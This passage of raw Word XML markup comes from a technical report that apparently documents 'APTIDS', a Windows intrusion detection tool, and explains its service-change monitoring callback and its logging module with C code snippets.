        <w:t xml:space="preserve">notifyBuffer: An object of the struct SERVICE_NOTIFYW which stores information for using in the functionalities of NotifyServiceStatusChange. notifyBuffer stores some essential information such as </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC1E10" w:rsidRDefault="00FC1E10" w:rsidP="00FC1E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A number indicating the version in use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC1E10" w:rsidRDefault="00FC1E10" w:rsidP="00FC1E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A pointer to the callback function used for handling SCM events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A90303" w:rsidRPr="00A90303" w:rsidRDefault="00FC1E10" w:rsidP="00A90303">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A callback context which stores arguments for passing to the callback function.</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memset(&amp;notifyBuffer,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notifyBuffer.pfnNotifyCallback = &amp;NotifyCallback;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A90303" w:rsidRDefault="00A90303" w:rsidP="002052C4">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:firstLine="710"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A90303">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>notifyBuffer.pContext = (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90303">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90303">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> CALLBACK_CONTEXT*) pstCallbackContext;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRPr="00A90303" w:rsidRDefault="002565A7" w:rsidP="002052C4">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:firstLine="710"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002052C4" w:rsidRPr="002052C4" w:rsidRDefault="00A90303" w:rsidP="002052C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">secAttribute: An object of SECURITY_ATTRIBUTES struct </w:t>
      </w:r>
      <w:r w:rsidR="001D2799">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>that stores a so call security definition for creating an event.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secAttribute.nLength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SECURITY_ATTRIBUTES</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secAttribute.lpSecurityDescriptor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secAttribute.bInheritHandle = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>FALSE</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notifyEventHandle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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateEventEx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">(&amp;secAttribute,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CREATE_EVENT_INITIAL_SET</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EVENT_ALL_ACCESS</w:t>
      </w:r>
      <w:r w:rsidRPr="001D2799">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C66A05" w:rsidRDefault="00C66A05" w:rsidP="001D2799">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>SvcChangeNotify calls OpenSCManager to get a SCM handle</w:t>
      </w:r>
      <w:r w:rsidR="004D43D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the “desire access” is SC_MANAGER_ENUMERATE_SERVICE for SCM handle has a permission to enumerate Windows Services.</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scManagerHandle = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>OpenSCManager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</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SC_MANAGER_ENUMERATE_SERVICE</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(scManagerHandle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L"Cannot open SC Manager ! \n"</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C66A05">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D43D6" w:rsidRDefault="00C66A05" w:rsidP="004D43D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">SvcChangeNotify then calls NotifyServiceStatusChange, a Windows API for notifying any change happened to SCM. </w:t>
      </w:r>
      <w:r w:rsidR="004D43D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>NotifyServiceStatusChange takes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D43D6" w:rsidRDefault="004D43D6" w:rsidP="004D43D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The SCM handle </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D43D6" w:rsidRDefault="004D43D6" w:rsidP="004D43D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A DWORD value which is SERVICE_NOTIFY_CREATED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> xor SERVICE_NOTIFY_DELETED indicates that NotifyServiceStatusChange will monitor any service which is created or deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C66A05" w:rsidRPr="004D43D6" w:rsidRDefault="004D43D6" w:rsidP="004D43D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D43D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A pointer to notifyBuffer, which is a struct object for storing information about the event handle, the callback context and also the pointer to the callback function to be executed when events happen.</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dwResult = NotifyServiceStatusChangeW(</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scManagerHandle,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&amp;notifyBuffer);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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4D43D6" w:rsidRDefault="004D43D6" w:rsidP="004D43D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">NotifyCallback is a function which is executed when an event happened. SvcChangeNotify calls NotifyServiceStatusChange, this function add NotifyCallback to a APC queue which is executed next time NotifyServiceStatusChange is called again. SvcChangeNotify then calls WaitForSingleObject to wait for any event happen, and the thread will be halt until any event is capture by WaitForSingleObject. When an event happens, WaitForSingleObject return control to the thread, a while loop then executes NotifyServiceStatusChange again, for its to execute any function in its APC queue, which is NotifyCallback.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memset(&amp;notifyBuffer,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notifyBuffer.pfnNotifyCallback = &amp;NotifyCallback;</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notifyBuffer.pContext =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CALLBACK_CONTEXT*) pstCallbackContext;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dwResult = NotifyServiceStatusChangeW(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scManagerHandle,</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&amp;notifyBuffer);</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Notify Callback function</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WaitForSingleObjectEx(pstCallbackContext-&gt;hNotifyEventHandler,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ERROR_SERVICE_NOTIFY_CLIENT_LAGGING</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 case SCM lags</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L"Client Lagging !\n"</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Sleep(5);</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while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRPr="004D43D6" w:rsidRDefault="002565A7"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eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D43D6" w:rsidRDefault="000D022A" w:rsidP="000D022A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NoitifyCallback processes any operation which must be taken in case an event happened.</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CALLBACK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> NotifyCallback(</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IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>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pParameter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wchTime;</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PSERVICE_NOTIFYW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> notifyBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PSERVICE_NOTIFYW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>pParameter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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D022A" w:rsidRDefault="000D022A" w:rsidP="000D022A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When NotifyServiceStatusChange successfully captures an event, based on the event types, NotifyCallback alert a suitable log message.</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(notifyBuffer-&gt;dwNotificationStatus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L"System Services Modified !\n"</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(notifyBuffer-&gt;dwNotificationTriggered)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SERVICE_NOTIFY_CREATED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L"Service Created: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wcscat(wchLogBuffer, notifyBuffer-&gt;pszServiceNames + (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)1);</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L"Service Deleted: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wcscat(wchLogBuffer, notifyBuffer-&gt;pszServiceNames);</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wcscat(wchLogBuffer,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WriteLog(</w:t>
      </w:r>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D022A" w:rsidRDefault="000D022A" w:rsidP="000D022A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00326F1A" w:rsidRDefault="00326F1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B77A88" w:rsidRDefault="00993912" w:rsidP="00B77A88">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc485239607"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Log Module</w:t>
      </w:r>
      <w:r w:rsidR="00B77A88">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> function</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w:rsidR="00993912" w:rsidRDefault="00993912" w:rsidP="00993912">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">In APTIDS, Log Module perform </w:t>
      </w:r>
      <w:r w:rsidR="00BE47BE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>three</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations. Firstly, “getDateTime” is called to get the current time and date at which an event occurs, using a function called “localtime”.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getDateTime(</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time_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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tm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> * timeinfo;</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timeBuffer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calloc(80,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time(&amp;rawtime);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timeinfo = localtime(&amp;rawtime);</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 xml:space="preserve">strftime(timeBuffer, 80, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"[%d-%m-%Y %I:%M:%S] "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, timeinfo);</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 xml:space="preserve"> The time return by “localtime” is in UTF-8 format, for return the date time value in bot UTF-8 and UTF-16, we implement a conversion in getDateTime.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//Conver to Unicode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lpTimeBuffer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INT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> cbByteNeeded = MultiByteToWideChar(</w:t>
      </w:r>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0);</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lpTimeBuffer =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calloc(cbByteNeeded,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LPWSTR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MultiByteToWideChar(</w:t>
      </w:r>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cbByteNeeded);</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When the first argument is set to NULL and the second is passed in a wide char pointer (LPWSTR), getDateTime returns datetime data in UTF-16 format. Vice versa, it returns data in UTF-8. When both arguments are set, it returns data in UTF-8 and UTF-16. When both are NULL, it returns none.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993912" w:rsidRDefault="00993912" w:rsidP="00993912">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE47BE" w:rsidRDefault="00BE47BE" w:rsidP="00993912">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The second operation in Log Module is for writing log, which is a function called “WriteLog”.</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WriteLog(</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wchLogBuffer</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wchLogTmpFile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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE47BE" w:rsidRDefault="00BE47BE" w:rsidP="00BE47BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>WriteLog specified a DWORD variable called “dwLogType” for identifying the type of log data being written. There are 2 type of log data in APTIDS, the LOG_TYPE_REGISTRY and LOG_TYPE_SERVICE defined in DataTypes.h.</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1</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2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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BE47BE" w:rsidRDefault="00BE47BE" w:rsidP="00BE47BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When calls for writing log, APTIDS modules have to specify exactly which log type this data need to be written. Based on the log type, WriteLog generate specific name for log file and write data to that file.</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L"Logs/Services.log"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L"Logs/tmpService.Log"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BE47BE" w:rsidRDefault="0074553E" w:rsidP="00BE47BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">There are 2 type of log files for each log type. A main log file which is used for storing log in the local system. This file will be written continuously. Another file is a temperamental log file, which is used to store a single line of the newest log data. This file and its content is read by a function for sending log to DLCH. </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Write to end of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dwByteNeeded = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_tcslen</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 lpOverLapped = (</w:t>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)calloc(1,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OVERLAPPED</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lpOverLapped-&gt;OffsetHigh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dwByteNeeded *= 2;</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WriteFile(hFile,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lpOverLapped);</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AND WRITE TO TEMP LOG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hFile = CreateFileW(wchLogTmpFile, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GENERIC_WRITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>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CREATE_ALWAYS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 0, 0);</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WriteFile(hFile,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0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003813E4" w:rsidRDefault="003813E4"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CloseHandle(hFile);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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A48F6" w:rsidRDefault="000A48F6" w:rsidP="000A48F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A48F6" w:rsidRDefault="000A48F6" w:rsidP="000A48F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, </w:t>
      </w:r>
      <w:r w:rsidR="00EF58FF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Log Module calls a function name “Networking” for sending log to DLCH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF58FF" w:rsidRDefault="00EF58FF" w:rsidP="000A48F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When APTIDS is fired up for the first time in a machine, it get</w:t>
      </w:r>
      <w:r w:rsidR="00F33A57">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the machine’s computer name and windows version, then store them in a file called “System.info”, the content looks like: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Pr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF58FF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
